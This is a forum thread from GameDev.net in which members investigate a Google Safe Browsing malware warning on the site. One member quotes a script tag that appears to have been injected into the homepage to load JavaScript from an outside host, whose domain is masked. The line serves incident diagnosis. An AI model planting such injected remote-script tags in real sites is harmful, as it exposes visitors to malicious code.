🎉 Celebrating 25 Years of GameDev.net! 🎉

Not many can claim 25 years on the Internet! Join us in celebrating this milestone. Learn more about our history, and thank you for being a part of our community!

Back to GDNet Comments, Suggestions, and Ideas

"Google Safe Browsing recently detected malware on www.gamedev.net"

GDNet Comments, Suggestions, and Ideas Community

Started by Aqua Costa September 16, 2014 02:01 PM

25 comments, last by Madhed 9 years, 9 months ago

Aqua Costa

3,705

Author

September 16, 2014 02:01 PM

Hi,

I just noticed that when I try to access GameDev.net through a google search this page is displayed:

I don't know when this started because I usually use a bookmark to open GameDev.net and this page is only shown when using google search.

Edit: That page is being displayed in various pages inside GameDev.net, even without using google search. Since it doesn't always happen maybe it's related to ads?

Orymus3

18,866

September 16, 2014 02:46 PM

Got it as well, when returning to the forums form this exact thread.

Doesn't occur anywhere else though?

Jan2go

2,057

September 16, 2014 04:45 PM

Also right after leaving this thread.

frob

46,242

September 16, 2014 05:07 PM

Do you knowwhat specific URLs are triggering it? I've been here for the past few hours and not seen it.

EDIT: naturally, moments afterward, I see it by reloading this exact page.

EDIT #2: Easy repro steps for me: hit "edit post", hit "use full editor", get red screen. Maybe it is from one of the text editor widgets?

Aqua Costa

3,705

Author

September 16, 2014 05:17 PM

Doesn't occur anywhere else though?

It occurs when I open gamedev.net from a google search (1st link) and like you said, when leaving this exact thread.

What kind of black magic would cause the warning to show when leaving this exact thread?

EDIT: @frob, even easier: from this exact page click in any link to another page inside GameDev.net. Eg: CLICK HERE TO SEE WARNING (it's just a link to Gamedev.net webpage)

EDIT #2: Looks like the warning is only displayed when I'm logged in. In incognito it doesn't happen.

frob

46,242

September 16, 2014 05:27 PM

Yup, creepy.

I have no idea who those people are, but I now dislike them. Quit ruining the Interwebs with stupid malware!

Washu

7,836

September 16, 2014 10:31 PM

So, I just went through the google report on GameDev.net...

it would appear that it is actually looking at a different site... google report So I'm not entirely certain what is going on here.

Although I believe what is going on is that the network that is hosing gamedev.net has several other sites that display suspicious activity and that might be what is getting us flagged.

In time the project grows, the ignorance of its devs it shows, with many a convoluted function, it plunges into deep compunction, the price of failure is high, Washu's mirth is nigh.

fastcall22

10,918

September 16, 2014 11:33 PM

Here's the offending code... It looks to be injected into the homepage.

<script type="text/javascript" src="http://***.com/MpVsP35HvGR1mOnK.js?jvYHKuqnSM=c670ed79770ae68eeada83"></script>

Requesting the file without the GET query returns a 404. I won't explore any farther than that.

Also, thank goodness for NoScript and RequestPolicy.

Washu

7,836

September 16, 2014 11:50 PM

Yep, I see that now. Interesting. I've reported your post to make it a bit more visible to zee important peoplez of gamedev.

In time the project grows, the ignorance of its devs it shows, with many a convoluted function, it plunges into deep compunction, the price of failure is high, Washu's mirth is nigh.